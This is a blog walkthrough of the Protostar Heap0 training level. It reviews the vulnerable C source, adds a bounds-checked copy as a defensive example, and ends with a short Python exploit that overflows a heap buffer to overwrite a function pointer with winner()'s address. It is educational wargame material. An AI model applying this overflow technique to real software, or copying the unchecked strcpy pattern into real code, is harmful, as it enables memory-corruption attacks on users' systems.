Binary Exploitation Protostar Heap0 - Walkthrough - Writeups

Hello Guyz,

Welcome again to my blog. Today I am going to share with you my walkthrough of the Exploit Exercises Protostar Heap0 level.

In this level, our task is to execute the winner function through a heap overflow.

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here I am just providing hints and references, so that if you feel stuck anywhere you can take a look.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and gdb.
  • Do some research about heap overflow exploitation.

Source Code

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Hint

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Code Review

  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));   <--- Allocate space for the data struct (64-byte name)
  f = malloc(sizeof(struct fp));     <--- Allocate space for the fp struct, which lands right after the data chunk on the heap
  f->fp = nowinner;                  <--- Store the address of nowinner() in the function pointer

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);          <--- No input size check: argv[1] longer than 64 bytes runs past name into the next chunk

  f->fp();                           <--- Call whatever address is now stored in f->fp (nowinner unless it was overwritten)

Plan

As you can see, there is nothing in the source code that verifies the length of the user input. Hence we can overflow the heap from d->name into the neighbouring fp struct and overwrite the function pointer with the address of winner, so that f->fp() calls winner instead of nowinner.
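To make the weakness concrete from the defensive side, here is an added example (mine, not part of the level or the original post) that keeps the level's two structs and the same two malloc calls, but replaces the unbounded strcpy with a length-checked copy that refuses input that does not fit. It also computes the distance between the two allocations, which is the same pair of addresses the level prints; on the 32-bit Protostar VM that distance is 72 bytes, on other platforms it differs. The function names copy_name_checked, fp_intact_after_checked_copy and heap_distance are my own.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Same two structs as the level, so the heap layout is the same. */
struct data {
  char name[64];
};

struct fp {
  int (*fp)(void);
};

static int nowinner(void)
{
  return 0;
}

/* Bounded replacement for the level's strcpy(d->name, argv[1]).
 * Returns 0 on success, -1 when the input plus its terminating NUL would
 * not fit. Nothing is written in the reject case, so the neighbouring
 * allocation can never be touched. */
int copy_name_checked(struct data *d, const char *src)
{
  size_t len = strlen(src);
  if (len >= sizeof d->name)
    return -1;
  memcpy(d->name, src, len + 1);
  return 0;
}

/* Allocates data and fp exactly as main() in the level does, copies `input`
 * with the checked routine, and reports whether f->fp still points to
 * nowinner. Returns 1 if the pointer is intact, 0 if it changed, -1 on
 * allocation failure. */
int fp_intact_after_checked_copy(const char *input)
{
  struct data *d = malloc(sizeof *d);
  struct fp *f = malloc(sizeof *f);
  int intact;
  if (!d || !f) {
    free(d);
    free(f);
    return -1;
  }
  f->fp = nowinner;
  (void)copy_name_checked(d, input); /* a rejected copy leaves name empty */
  intact = (f->fp == nowinner);
  free(f);
  free(d);
  return intact;
}

/* Distance in bytes from d to f, the two values the level prints with
 * "data is at %p, fp is at %p". On the 32-bit Protostar VM this is 72:
 * 64 bytes of name plus the 8-byte malloc chunk header in front of f.
 * Returns -1 on allocation failure. */
long heap_distance(void)
{
  struct data *d = malloc(sizeof *d);
  struct fp *f = malloc(sizeof *f);
  long dist = -1;
  if (d && f)
    dist = (long)((uintptr_t)f - (uintptr_t)d);
  free(f);
  free(d);
  return dist;
}

int main(void)
{
  /* Constructed oversized input: 199 'a' bytes, far more than name holds. */
  char attempt[200];
  struct data tmp;
  memset(attempt, 'a', sizeof attempt - 1);
  attempt[sizeof attempt - 1] = '\0';

  printf("distance from data to fp: %ld bytes\n", heap_distance());
  printf("199-byte input: copy %s, fp intact: %d\n",
         copy_name_checked(&tmp, attempt) == 0 ? "accepted" : "rejected",
         fp_intact_after_checked_copy(attempt));
  return 0;
}
```

Rejecting rather than silently truncating is a deliberate choice: a truncated name would still "work", but the caller would never learn that the input was dropped on the floor. The same check applied to the level's strcpy is all that separates the passed and not-passed outcomes.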

Implementation

  Heap overview (simplified)
 ---------------------------------------------
 | name[64]              | chunk hdr | fp    |
 ---------------------------------------------

  Overflow name and write the winner address into fp.

  The data chunk and the fp chunk sit back to back on the heap, with malloc's 8-byte chunk header (on the 32-bit Protostar VM) in between, so the function pointer is 72 bytes from the start of name. That is why the exploit below uses 72 bytes of padding before the address.

Exploit

#!/usr/bin/python
# Usage on the Protostar VM:
#   /opt/protostar/bin/heap0 $(python exploit.py)
import struct

# 64 bytes of name plus the 8-byte malloc chunk header of the fp allocation
buf = "a" * 72
# address of winner() as found in the heap0 binary
win = 0x08048464
# pack the address as a 4-byte little-endian value (x86)
ret = struct.pack("<I", win)

payload = ""
payload += buf
payload += ret
print payload

For a more detailed walkthrough, check the YouTube video playlist provided below.


